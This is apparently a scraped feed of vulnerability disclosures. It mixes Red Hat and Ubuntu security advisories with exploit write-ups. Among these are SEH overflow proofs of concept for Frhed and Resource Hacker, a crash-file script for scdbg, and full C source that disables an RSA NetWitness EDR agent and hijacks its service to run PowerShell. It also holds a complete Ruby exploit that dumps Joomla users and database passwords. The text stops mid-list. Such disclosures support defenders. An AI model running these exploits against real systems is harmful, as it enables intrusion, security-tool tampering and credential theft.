Frhed version 1.6.0 suffers from a buffer overflow vulnerability.

    # Exploit Title: Frhed (Free hex editor) v1.6.0 - Buffer overflow# Discovery by: Rafael Pedrero# Discovery Date: 2022-01-09# Vendor Homepage: http://frhed.sourceforge.net/# Software Link : http://frhed.sourceforge.net/# Tested Version: 1.6.0# Tested on:  Windows 10CVSS v3: 7.3CVSS vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:HCWE: CWE-119Buffer overflow controlling the Structured Exception Handler (SEH) recordsin Frhed (Free hex editor) v1.6.0, and possibly other versions, may allowattackers to execute arbitrary code via a long file name argument.Proof of concept:Open Frhed.exe from command line with a large string in Arguments, morethan 494 chars:File '<Frhed_PATH>\Frhed.exe'Arguments'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4...'SEH chain of main threadAddress    SE handler0018FC8C   4136714135714134   *** CORRUPT ENTRY ***0BADF00D   [+] Examining SEH chain0BADF00D       SEH record (nseh field) at 0x0018fc8c overwritten withnormal pattern : 0x35714134 (offset 494), followed by 876 bytes of cyclicdata after the handler0BADF00D   ------------------------------                       'Targets'        =>                           [                               [ '<fill in the OS/app version here>',                                   {                                       'Ret'         =>    0x00401ba7, #pop ecx # pop ecx # ret    - Frhed.exe (change this value by other without\x00)                                       'Offset'    =>    494                                   }                               ],                           ],

Frhed 1.6.0 Buffer Overflow

Resource Hacker version 3.6.0.92 suffers from a buffer overflow vulnerability.

    # Exploit Title: Resource Hacker 3.6.0.92 - Buffer overflow# Discovery by: Rafael Pedrero# Discovery Date: 2022-01-06# Vendor Homepage: http://www.angusj.com/resourcehacker/# Software Link : http://www.angusj.com/resourcehacker/# Tested Version: 3.6.0.92# Tested on:  Windows 10CVSS v3: 7.3CVSS vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:HCWE: CWE-119Heap-based buffer overflow controlling the Structured Exception Handler(SEH) records in Reseource Hacker v3.6.0.92, and possibly other versions,may allow attackers to execute arbitrary code via a long file name argument.Proof of concept:Open ResHacker.exe from command line with a large string in Arguments, morethan 268 chars:File 'C:\ResourceHacker36\ResHacker.exe'Arguments'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac...'SEH chain of main threadAddress    SE handler0018FCB4   316A41306A413969   *** CORRUPT ENTRY ***0BADF00D   [+] Examining SEH chain0BADF00D       SEH record (nseh field) at 0x0018fcb4 overwritten withnormal pattern : 0x6a413969 (offset 268), followed by 12 bytes of cyclicdata after the handler0BADF00D   ------------------------------'Targets'        =>[[ '<fill in the OS/app version here>',{                                       'Ret'         =>    0x00426446, #pop eax # pop ebx # ret    - ResHacker.exe (change this value from Mona,with a not \x00 ret address)                                       'Offset'    =>    268}],],

Resource Hacker 3.6.0.92 Buffer Overflow

Hex Workshop version 6.7 is vulnerable to denial of service via command line file arguments and control of the Structured Exception Handler (SEH) records.

    # Exploit Title: Hex Workshop v6.7 - Buffer overflow DoS# Discovery by: Rafael Pedrero# Discovery Date: 2022-01-06# Vendor Homepage: http://www.bpsoft.com, http://www.hexworkshop.com# Software Link : http://www.bpsoft.com, http://www.hexworkshop.com# Tested Version: v6.7# Tested on:  Windows 10CVSS v3: 7.3CVSS vector: CVSS:3.0/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:HCWE: CWE-119Hex Workshop v6.7 is vulnerable to denial of service via a command linefile arguments and control the Structured Exception Handler (SEH) records.Proof of concept:Open HWorks32.exe from command line with a large string in Arguments, morethan 268 chars:File 'C:\Hex Workshop\HWorks32.exe'Arguments'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag..."0BADF00D   [+] Examining SEH chain0BADF00D       SEH record (nseh field) at 0x0089e63c overwritten withunicode pattern : 0x00390069 (offset 268), followed by 0 bytes of cyclicdata after the handlerThe application crash.

Hex Workshop 6.7 Buffer Overflow / Denial Of Service

Scdbg version 1.0 suffers from a buffer overflow vulnerability that can cause a denial of service condition.

    # Exploit Title: Scdbg 1.0 - Buffer overflow DoS# Discovery by: Rafael Pedrero# Discovery Date: 2021-06-13# Vendor Homepage:  http://sandsprite.com/blogs/index.php?uid=7&pid=152# Software Link : https://github.com/dzzie/VS_LIBEMU# Tested Version: 1.0 - Compile date: Jun  3 2021 20:57:45# Tested on:  Windows 7, 10CVSS v3: 7.5CVSS vector: 3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:HCWE: CWE-400Vulnerability description: scdbg.exe (all versions) is affected by a Denialof Service vulnerability that occurs when you use the /foff parameter ornot with a specific shellcode causing it to shutdown. Any malware could usethis option to evade the scan.Proof of concept:Save this script like scdbg_crash.py and execute it: scdbg.exe -foff 1 -fscdbg_crash.bin / scdbg.exe -f scdbg_crash.bin#!/usr/bin/env pythoncrash = "\x90\xF6\x84\x01\x90\x90\x90\x90"f = open ("scdbg_crash.bin", "w")f.write(crash)f.close()You can use gui_launcher.exe and check "Start offset 0x": 1 or directlywithout check[image: image.png]

Scdbg 1.0 Denial Of Service

Red Hat Security Advisory 2023-1471-01 - This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel. Issues addressed include a double free vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: kpatch-patch security update  
Advisory ID:       RHSA-2023:1471-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1471  
Issue date:        2023-03-27  
CVE Names:         CVE-2022-4744 CVE-2023-0266   
=====================================================================

1. Summary:

An update for kpatch-patch is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS (v. 9) - ppc64le, x86_64

3. Description:

This is a kernel live patch module which is automatically loaded by the RPM  
post-install script to modify the code of a running kernel.

Security Fix(es):

* kernel: tun: avoid double free in tun_free_netdev (CVE-2022-4744)

* ALSA: pcm: Move rwsem lock inside snd_ctl_elem_read to prevent UAF  
(CVE-2023-0266)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2156322 - CVE-2022-4744 kernel: tun: avoid double free in tun_free_netdev  
2163379 - CVE-2023-0266 ALSA: pcm: Move rwsem lock inside snd_ctl_elem_read to prevent UAF

6. Package List:

Red Hat Enterprise Linux BaseOS (v. 9):

Source:  
kpatch-patch-5_14_0-162_12_1-1-2.el9_1.src.rpm  
kpatch-patch-5_14_0-162_18_1-1-1.el9_1.src.rpm  
kpatch-patch-5_14_0-162_6_1-1-3.el9_1.src.rpm

ppc64le:  
kpatch-patch-5_14_0-162_12_1-1-2.el9_1.ppc64le.rpm  
kpatch-patch-5_14_0-162_12_1-debuginfo-1-2.el9_1.ppc64le.rpm  
kpatch-patch-5_14_0-162_12_1-debugsource-1-2.el9_1.ppc64le.rpm  
kpatch-patch-5_14_0-162_18_1-1-1.el9_1.ppc64le.rpm  
kpatch-patch-5_14_0-162_18_1-debuginfo-1-1.el9_1.ppc64le.rpm  
kpatch-patch-5_14_0-162_18_1-debugsource-1-1.el9_1.ppc64le.rpm  
kpatch-patch-5_14_0-162_6_1-1-3.el9_1.ppc64le.rpm  
kpatch-patch-5_14_0-162_6_1-debuginfo-1-3.el9_1.ppc64le.rpm  
kpatch-patch-5_14_0-162_6_1-debugsource-1-3.el9_1.ppc64le.rpm

x86_64:  
kpatch-patch-5_14_0-162_12_1-1-2.el9_1.x86_64.rpm  
kpatch-patch-5_14_0-162_12_1-debuginfo-1-2.el9_1.x86_64.rpm  
kpatch-patch-5_14_0-162_12_1-debugsource-1-2.el9_1.x86_64.rpm  
kpatch-patch-5_14_0-162_18_1-1-1.el9_1.x86_64.rpm  
kpatch-patch-5_14_0-162_18_1-debuginfo-1-1.el9_1.x86_64.rpm  
kpatch-patch-5_14_0-162_18_1-debugsource-1-1.el9_1.x86_64.rpm  
kpatch-patch-5_14_0-162_6_1-1-3.el9_1.x86_64.rpm  
kpatch-patch-5_14_0-162_6_1-debuginfo-1-3.el9_1.x86_64.rpm  
kpatch-patch-5_14_0-162_6_1-debugsource-1-3.el9_1.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-4744  
https://access.redhat.com/security/cve/CVE-2023-0266  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZCFeo9zjgjWX9erEAQhTMxAAjkbvYHLRkuuSB3VY3ihfR5DvIO4x1Vif  
Jm0gCD3HELUiTHhZi7c//ofw5SJGUOveLOYG9B+4zo+tWSwUuWo2y1SPR4IYZrwn  
veal+E7uEfg4YxtmNkZW8ESTqTH6fktjmQ6rKvMCkJGa7P/DqTSMK98uVJyt2Enc  
21svytryErzK8MDZatcqMlcUgygkuQ6ZilPvU2kQZfTNoPcfCpQzcaQJneM5lCn5  
TTpnfhwKldxrwtxZGt69eAZgMGaMXyDfR6/ilCfXoVW6umlFFlQyOvHYgzViiVUs  
dpURqWG+O2sN0liOAMUKRjEHkQ7LM/D6mhUDINTL0ONhcVxzxzsJKl7Im0Olk0G3  
1YhVf4WJY4jknoZIU/TZAUXfGkzMqjHLohmF5pcQGe+QnYa8Z5WmBvPwoljhAx12  
A/9q6iKEeqOcJExwQL1NCIuuIcyj54161+zHp+7GshoIXLViNoTrJdWPI9qCXxkW  
czt7CzbsEYnBMuy1mdhkFbxyAHYXANnovTWTc5OSGPtthENCbTjm98rnWjrL9WFL  
nz4K+pNR3Hbl3lJ8yxJVXRhgNDGO6HsBrW9V6m5yJ4P5VPRUj+Z0WSuVoeBgansT  
S2jhzkVwo17eHd2sFKwlrVUEYuf9gzMZ7wmuRqUe6H6S9aON7d2Cxa68SB1OKD52  
PvmfHv4gde8=  
=TFt0  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1471-01

RSA NetWitness Endpoint EDR Agent version 12.x suffers from incorrect access controls that allow for code execution. It allows local users to stop the Endpoint Windows agent from sending the events to a SIEM or make the agent run user-supplied commands.

    [+] Credits: John Page (aka hyp3rlinx)    [+] Website: hyp3rlinx.altervista.org[+] Source:  http://hyp3rlinx.altervista.org/advisories/RSA_NETWITNESS_EDR_AGENT_INCORRECT_ACCESS_CONTROL_CVE-2022-47529.txt[+] twitter.com/hyp3rlinx[+] ISR: ApparitionSec      [Vendor]RSA Securitywww.netwitness.com[Product]NetWitness Endpoint EDR AgentThe RSA NetWitness detection and response (EDR) endpoint monitors activity across all your endpoints—on and off the network—providing deep visibilityinto their security state, and it prioritizes alerts when there is an issue. NetWitness Endpoint drastically reduces dwell time by rapidlydetecting new and non-malware attacks that other EDR solutions miss, and it cuts the cost, time and scope of incident response.[Vulnerability Type]Incorrect Access Control / Code Execution[CVE Reference]CVE-2022-47529[Security Issue]CVE-2022-47529 allows local users to stop the Endpoint Windows agent from sending the events to SIEM or make the agent run user-supplied commands.Insecure Win32 memory objects in Endpoint Windows Agents in the NetWitness Platform through 12.x allow localand admin Windows user accounts to modify the endpoint agent service configuration:to either disable it completely or run user-supplied code or commands, thereby bypassing tamper-protection features via ACL modification.Interestingly, the agent was uploaded to virustotal on 2022-01-05 17:24:32 UTC months before finding and report.SHA-256 770005f9b2333bf713ec533ef1efd2b65083a5cfb9f8cbb805ccb2eba423cc3dLANDeskService.exe[Severity]Critical[Impact(s)]Denial-of-Service Arbitrary Code Execution[Attack Vector]To exploit, open handle to memory objects held by the endpoint agent, modify the ACL for the ones that have insecure ACLs, and DENY access to Everyone group[Affected Product Code Base]All versions prior to v12.2[Network Access]Local[References]https://community.netwitness.com/t5/netwitness-platform-security/nw-2023-04-netwitness-platform-security-advisory-cve-2022-47529/ta-p/696935[Vuln Code Block]:00000001400F7B10 sub_1400F7B10   proc near               ; CODE XREF: sub_14012F6F0+19B?p.text:00000001400F7B10                                         ; sub_14013BA50+19?p.text:00000001400F7B10                                         ; DATA XREF: ....text:00000001400F7B10                 push    rbx.text:00000001400F7B12                 sub     rsp, 20h.text:00000001400F7B16                 mov     rbx, rcx.text:00000001400F7B19                 test    rcx, rcx.text:00000001400F7B1C                 jz      short loc_1400F7B5C.text:00000001400F7B1E                 call    cs:InitializeCriticalSection.text:00000001400F7B24                 lea     rcx, [rbx+28h]  ; lpCriticalSection.text:00000001400F7B28                 call    cs:InitializeCriticalSection.text:00000001400F7B2E                 mov     edx, 1          ; bManualReset.text:00000001400F7B33                 xor     r9d, r9d        ; lpName.text:00000001400F7B36                 mov     r8d, edx        ; bInitialState.text:00000001400F7B39                 xor     ecx, ecx        ; lpEventAttributes.text:00000001400F7B3B                 call    cs:CreateEventW.text:00000001400F7B41                 mov     [rbx+50h], rax.text:00000001400F7B45                 mov     dword ptr [rbx+58h], 0.text:00000001400F7B4C                 test    rax, rax.text:00000001400F7B4F                 jz      short loc_1400F7B5C[Exploit/POC]"RSA_NetWitness_Exploit.c"#include "windows.h"#include "stdio.h"#include "accctrl.h"#include "aclapi.h"#define OPEN_ALL_ACCESS 0x1F0003/*RSA NetWitness EDR Endpoint AgentTamper Protection Bypass / EoP Code ExecutionRSA NetWitness.msi --> NWEAgent.exeMD5: c0aa7e52cbf7799161bac9ebefa38d49Expected result: Low privileged standard users are prevented from interfering with and or modifying events for the RSA Endpoint Agent.Actual result: RSA NetWitness Endpoint Agent is terminated by a low privileged standard non-administrator user.By John Page (hyp3rlinx) - Nov 2022 DISCLAIMER: The author of this code is not responsible or liable for any damages whatsoever from testing, modifying and or misuse.Users of this supplied PoC code accept all risks, do no harm. X64 PE file vuln code block:00000001400F7B10 sub_1400F7B10   proc near               ; CODE XREF: sub_14012F6F0+19B?p.text:00000001400F7B10                                         ; sub_14013BA50+19?p.text:00000001400F7B10                                         ; DATA XREF: ....text:00000001400F7B10                 push    rbx.text:00000001400F7B12                 sub     rsp, 20h.text:00000001400F7B16                 mov     rbx, rcx.text:00000001400F7B19                 test    rcx, rcx.text:00000001400F7B1C                 jz      short loc_1400F7B5C.text:00000001400F7B1E                 call    cs:InitializeCriticalSection.text:00000001400F7B24                 lea     rcx, [rbx+28h]  ; lpCriticalSection.text:00000001400F7B28                 call    cs:InitializeCriticalSection.text:00000001400F7B2E                 mov     edx, 1          ; bManualReset.text:00000001400F7B33                 xor     r9d, r9d        ; lpName.text:00000001400F7B36                 mov     r8d, edx        ; bInitialState.text:00000001400F7B39                 xor     ecx, ecx        ; lpEventAttributes.text:00000001400F7B3B                 call    cs:CreateEventW.text:00000001400F7B41                 mov     [rbx+50h], rax.text:00000001400F7B45                 mov     dword ptr [rbx+58h], 0.text:00000001400F7B4C                 test    rax, rax.text:00000001400F7B4F                 jz      short loc_1400F7B5C1) Install "RSA NetWitness.msi"  (Endpoint EDR Agent)2) Run Exploit PoC as a Standard non-admin user, the PoC will:   a) Open a handle (copy) to Ecat002 event.   b) Open additional handles for events Ecat004 and Ecat002, modifying them to deny access to Everyone group.   c) Set/Reset event the Ecat002 handle.   d) if admin privs change the EDR service configuration    Non vulnerable agents will output "Not vulnerable to the console", customers can modify and use test to see if vuln.*/char Vuln_Events[][32] = {"Global\\Ecat004", "Global\\Ecat002"};BOOL PWNED=FALSE;void Exploit();int AdminChl();void HijackSvcConfig();                                                                                                                                        int main(void){  printf("[+] RSA NetWitness EDR Agent 0Day\n");  printf("[+] CVE-2022-47529\n");  printf("[+] Discovery: John Page (aka hyp3rlinx)\n");  printf("[+] ===================================\n");    Exploit();    if( AdminChk() ){     printf("[+] Hijacked NetWitness Agent Service!\n");     HijackSvcConfig();  }    Sleep(2000);  printf("[+] Done!\n\n");        system("pause");  return 0;}void Exploit(){    PACL pOldDACL = NULL;  PACL pNewDACL = NULL;    HANDLE hEvent_Ecat002 = OpenEventA(OPEN_ALL_ACCESS,FALSE,(LPCSTR)"Global\\Ecat002");  int i=0;    for(; i < sizeof(Vuln_Events) /  sizeof(Vuln_Events[0]); i++){    HANDLE hEvent = OpenEventA(OPEN_ALL_ACCESS,FALSE,(LPCSTR)Vuln_Events[i]);     if(hEvent != INVALID_HANDLE_VALUE){       printf("[-] Targeting Event: %s\n", Vuln_Events[i]);       Sleep(500);    if(GetSecurityInfo(hEvent, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, &pOldDACL, NULL, NULL) == ERROR_SUCCESS){    TRUSTEE trustee[1];    trustee[0].TrusteeForm = TRUSTEE_IS_NAME;    trustee[0].TrusteeType = TRUSTEE_IS_GROUP;    trustee[0].ptstrName = TEXT("Everyone");     trustee[0].MultipleTrusteeOperation = NO_MULTIPLE_TRUSTEE;    trustee[0].pMultipleTrustee = NULL;    EXPLICIT_ACCESS explicit_access_list[1];    ZeroMemory(&explicit_access_list[0], sizeof(EXPLICIT_ACCESS));    explicit_access_list[0].grfAccessMode = DENY_ACCESS;     explicit_access_list[0].grfAccessPermissions = GENERIC_ALL;    explicit_access_list[0].grfInheritance = NO_INHERITANCE;    explicit_access_list[0].Trustee = trustee[0];        if(SetEntriesInAcl(1, explicit_access_list, pOldDACL, &pNewDACL) != ERROR_SUCCESS){      printf("%s%d", "[!] Not vulnerable! ", GetLastError());    }          if(SetSecurityInfo(hEvent, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, pNewDACL, NULL) != ERROR_SUCCESS){                   printf("%s%d", "[!] Not vulnerable! ", GetLastError());      }else{         SetEvent(hEvent_Ecat002);         Sleep(1000);         ResetEvent(hEvent_Ecat002);         CloseHandle(hEvent_Ecat002);         SetEvent(hEvent);         Sleep(1000);         PWNED=TRUE;      }    if(PWNED){  LocalFree(pNewDACL);        LocalFree(pOldDACL);        CloseHandle(hEvent);    }    Sleep(1000);  } }    }}//If run as admin, modify the agent service config to run our own code.int AdminChk(){    int result = 0;    HANDLE hToken = NULL;    if(OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY,&hToken)){        TOKEN_ELEVATION elevated;        DWORD tokSize = sizeof(TOKEN_ELEVATION);        if(GetTokenInformation(hToken, TokenElevation, &elevated, sizeof(elevated), &tokSize)){            result = elevated.TokenIsElevated;        }     }    if(hToken){      CloseHandle(hToken);    }    return result;}//Trivial example modify the service config...void HijackSvcConfig(){  Sleep(1000);  WinExec("sc failure NWEAgent command= ""C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" "Evil-Command-Here""", 0);}[POC Video URL]https://www.youtube.com/watch?v=kO1fu4IOlSs[Disclosure Timeline]Vendor Notification: December 2, 2022CVE assigned: December 19, 2022 Hotfix v12.1.0.1: January 3, 2023Fixed in v12.2.0.0 January 4, 2023Restested for vendor: January 6, 2023March 24, 2023 : Public Disclosure[+] DisclaimerThe information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, andthat due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due creditis given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibilityfor any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related informationor exploits by the author or elsewhere. All content (c).hyp3rlinx

RSA NetWitness Endpoint EDR Agent 12.x Incorrect Access Control / Code Execution

Ubuntu Security Notice 5971-1 - It was discovered that graphviz contains null pointer dereference vulnerabilities. Exploitation via a specially crafted input file can cause a denial of service. This issue only affected Ubuntu 18.04 LTS. It was discovered that graphviz contains null pointer dereference vulnerabilities. Exploitation via a specially crafted input file can cause a denial of service. These issues only affected Ubuntu 14.04 ESM and Ubuntu 18.04 LTS.

==========================================================================  
Ubuntu Security Notice USN-5971-1  
March 24, 2023

graphviz vulnerabilities  
==========================================================================

A security issue affects these releases of Ubuntu and its derivatives:

- Ubuntu 20.04 ESM  
- Ubuntu 18.04 ESM  
- Ubuntu 14.04 ESM

Summary:

Several security issues were fixed in graphviz.

Software Description:  
- graphviz: rich set of graph drawing tools

Details:

It was discovered that graphviz contains null pointer dereference  
vulnerabilities. Exploitation via a specially crafted input file can cause  
a denial of service. This issue only affected Ubuntu 18.04 LTS.  
(CVE-2018-10196)

It was discovered that graphviz contains null pointer dereference  
vulnerabilities. Exploitation via a specially crafted input file can cause  
a denial of service. These issues only affected Ubuntu 14.04 ESM and Ubuntu  
18.04 LTS. (CVE-2019-11023)

It was discovered that graphviz contains a buffer overflow vulnerability.  
Exploitation via a specially crafted input file can cause a denial of  
service or possibly allow for arbitrary code execution. These issues only  
affected Ubuntu 14.04 ESM, Ubuntu 18.04 LTS and Ubuntu 20.04 LTS.  
(CVE-2020-18032)

Update instructions:

The problem can be corrected by updating your system to the following  
package versions:

Ubuntu 20.04 ESM:  
graphviz 2.42.2-3ubuntu0.1~esm1

Ubuntu 18.04 ESM:  
graphviz 2.40.1-2ubuntu0.1~esm1

Ubuntu 14.04 ESM:  
graphviz 2.36.0-0ubuntu3.2+esm1

The problem can be corrected by updating your system to the following  
package versions:

References:  
https://ubuntu.com/security/notices/USN-5971-1  
CVE-2018-10196, CVE-2019-11023, CVE-2020-18032

Ubuntu Security Notice USN-5971-1

Joomla! versions prior to 4.2.8 suffer from an unauthenticated information disclosure vulnerability.

    #!/usr/bin/env ruby# Exploit## Title: Joomla! < 4.2.8 - Unauthenticated information disclosure## Exploit author: noraj (Alexandre ZANNI) for ACCEIS (https://www.acceis.fr)## Author website: https://pwn.by/noraj/## Exploit source: https://github.com/Acceis/exploit-CVE-2023-23752## Date: 2023-03-24## Vendor Homepage: https://www.joomla.org/## Software Link: https://downloads.joomla.org/cms/joomla4/4-2-7/Joomla_4-2-7-Stable-Full_Package.tar.gz?format=gz## Version: 4.0.0 < 4.2.8 (it means from 4.0.0 up to 4.2.7)## Tested on: Joomla! Version 4.2.7## CVE : CVE-2023-23752# Vulnerability## Discoverer: Zewei Zhang from NSFOCUS TIANJI Lab## Date: 2023-02-24## Discoverer website: https://nsfocusglobal.com/company-overview/nsfocus-security-labs/## Title: Joomla Unauthorized Access## CVE: CVE-2023-23752## Patch: Update to >= 4.2.8## References:##   - https://nsfocusglobal.com/joomla-unauthorized-access-vulnerability-cve-2023-23752-notice/##   - https://developer.joomla.org/security-centre/894-20230201-core-improper-access-check-in-webservice-endpoints.html##   - https://attackerkb.com/topics/18qrh3PXIX/cve-2023-23752##   - https://nvd.nist.gov/vuln/detail/CVE-2023-23752##   - https://vulncheck.com/blog/joomla-for-rce##   - https://github.com/projectdiscovery/nuclei-templates/blob/main/cves/2023/CVE-2023-23752.yaml# standard libraryrequire 'json'# gemsrequire 'httpx'require 'docopt'require 'paint'doc = <<~DOCOPT  #{Paint['Joomla! < 4.2.8 - Unauthenticated information disclosure', :bold]}  #{Paint['Usage:', :red]}    #{__FILE__} <url> [options]    #{__FILE__} -h | --help  #{Paint['Parameters:', :red]}    <url>       Root URL (base path) including HTTP scheme, port and root folder  #{Paint['Options:', :red]}    --debug     Display arguments    --no-color  Disable colorized output (NO_COLOR environment variable is respected too)    -h, --help  Show this screen  #{Paint['Examples:', :red]}    #{__FILE__} http://127.0.0.1:4242    #{__FILE__} https://example.org/subdir  #{Paint['Project:', :red]}    #{Paint['author', :underline]} (https://pwn.by/noraj / https://twitter.com/noraj_rawsec)    #{Paint['company', :underline]} (https://www.acceis.fr / https://twitter.com/acceis)    #{Paint['source', :underline]} (https://github.com/Acceis/exploit-CVE-2023-23752)DOCOPTdef fetch_users(root_url, http)  vuln_url = "#{root_url}/api/index.php/v1/users?public=true"  http.get(vuln_url)enddef parse_users(root_url, http)  data_json = fetch_users(root_url, http)  data = JSON.parse(data_json)['data']  users = []  data.each do |user|    if user['type'] == 'users'      id = user['attributes']['id']      name = user['attributes']['name']      username = user['attributes']['username']      email = user['attributes']['email']      groups = user['attributes']['group_names']      users << {id: id, name: name, username: username, email: email, groups: groups}    end  end  usersenddef display_users(root_url, http)  users = parse_users(root_url, http)  puts Paint['Users', :red, :bold]  users.each do |u|    puts "[#{u[:id]}] #{u[:name]} (#{Paint[u[:username], :yellow]}) - #{u[:email]} - #{u[:groups]}"  endenddef fetch_config(root_url, http)  vuln_url = "#{root_url}/api/index.php/v1/config/application?public=true"  http.get(vuln_url)enddef parse_config(root_url, http)  data_json = fetch_config(root_url, http)  data = JSON.parse(data_json)['data']  config = {}  data.each do |entry|    if entry['type'] == 'application'      key = entry['attributes'].keys.first      config[key] = entry['attributes'][key]    end  end  configenddef display_config(root_url, http)  c = parse_config(root_url, http)  puts Paint['Site info', :red, :bold]  puts "Site name: #{c['sitename']}"  puts "Editor: #{c['editor']}"  puts "Captcha: #{c['captcha']}"  puts "Access: #{c['access']}"  puts "Debug status: #{c['debug']}"  puts  puts Paint['Database info', :red, :bold]  puts "DB type: #{c['dbtype']}"  puts "DB host: #{c['host']}"  puts "DB user: #{Paint[c['user'], :yellow, :bold]}"  puts "DB password: #{Paint[c['password'], :yellow, :bold]}"  puts "DB name: #{c['db']}"  puts "DB prefix: #{c['dbprefix']}"  puts "DB encryption #{c['dbencryption']}"endbegin  args = Docopt.docopt(doc)  Paint.mode = 0 if args['--no-color']  puts args if args['--debug']  http = HTTPX  display_users(args['<url>'], http)  puts  display_config(args['<url>'], http)rescue Docopt::Exit => e  puts e.messageend

Joomla! 4.2.7 Unauthenticated Information Disclosure

Ubuntu Security Notice 5970-1 - It was discovered that the KVM VMX implementation in the Linux kernel did not properly handle indirect branch prediction isolation between L1 and L2 VMs. An attacker in a guest VM could use this to expose sensitive information from the host OS or other guest VMs. It was discovered that a race condition existed in the Xen network backend driver in the Linux kernel when handling dropped packets in certain circumstances. An attacker could use this to cause a denial of service.

    ==========================================================================Ubuntu Security Notice USN-5970-1March 23, 2023linux, linux-aws, linux-azure, linux-gcp, linux-ibm, linux-kvm,linux-lowlatency, linux-oracle, linux-raspi vulnerabilities==========================================================================A security issue affects these releases of Ubuntu and its derivatives:- Ubuntu 22.10Summary:Several security issues were fixed in the Linux kernel.Software Description:- linux: Linux kernel- linux-aws: Linux kernel for Amazon Web Services (AWS) systems- linux-azure: Linux kernel for Microsoft Azure Cloud systems- linux-gcp: Linux kernel for Google Cloud Platform (GCP) systems- linux-ibm: Linux kernel for IBM cloud systems- linux-kvm: Linux kernel for cloud environments- linux-lowlatency: Linux low latency kernel- linux-oracle: Linux kernel for Oracle Cloud systems- linux-raspi: Linux kernel for Raspberry Pi systemsDetails:It was discovered that the KVM VMX implementation in the Linux kernel didnot properly handle indirect branch prediction isolation between L1 and L2VMs. An attacker in a guest VM could use this to expose sensitiveinformation from the host OS or other guest VMs. (CVE-2022-2196)It was discovered that a race condition existed in the Xen network backenddriver in the Linux kernel when handling dropped packets in certaincircumstances. An attacker could use this to cause a denial of service(kernel deadlock). (CVE-2022-42328, CVE-2022-42329)Gerald Lee discovered that the USB Gadget file system implementation in theLinux kernel contained a race condition, leading to a use-after-freevulnerability in some situations. A local attacker could use this to causea denial of service (system crash) or possibly execute arbitrary code.(CVE-2022-4382)José Oliveira and Rodrigo Branco discovered that the prctl syscallimplementation in the Linux kernel did not properly protect againstindirect branch prediction attacks in some situations. A local attackercould possibly use this to expose sensitive information. (CVE-2023-0045)It was discovered that a use-after-free vulnerability existed in theAdvanced Linux Sound Architecture (ALSA) subsystem. A local attacker coulduse this to cause a denial of service (system crash). (CVE-2023-0266)It was discovered that the io_uring subsystem in the Linux kernel containeda use-after-free vulnerability. A local attacker could possibly use this tocause a denial of service (system crash) or execute arbitrary code.(CVE-2023-0469)It was discovered that the CIFS network file system implementation in theLinux kernel contained a user-after-free vulnerability. A local attackercould possibly use this to cause a denial of service (system crash) orexecute arbitrary code. (CVE-2023-1195)It was discovered that the RNDIS USB driver in the Linux kernel containedan integer overflow vulnerability. A local attacker with physical accesscould plug in a malicious USB device to cause a denial of service (systemcrash) or possibly execute arbitrary code. (CVE-2023-23559)Update instructions:The problem can be corrected by updating your system to the followingpackage versions:Ubuntu 22.10:   linux-image-5.19.0-1015-raspi   5.19.0-1015.22   linux-image-5.19.0-1015-raspi-nolpae  5.19.0-1015.22   linux-image-5.19.0-1019-gcp     5.19.0-1019.21   linux-image-5.19.0-1019-ibm     5.19.0-1019.21   linux-image-5.19.0-1019-oracle  5.19.0-1019.22   linux-image-5.19.0-1020-kvm     5.19.0-1020.21   linux-image-5.19.0-1021-lowlatency  5.19.0-1021.22   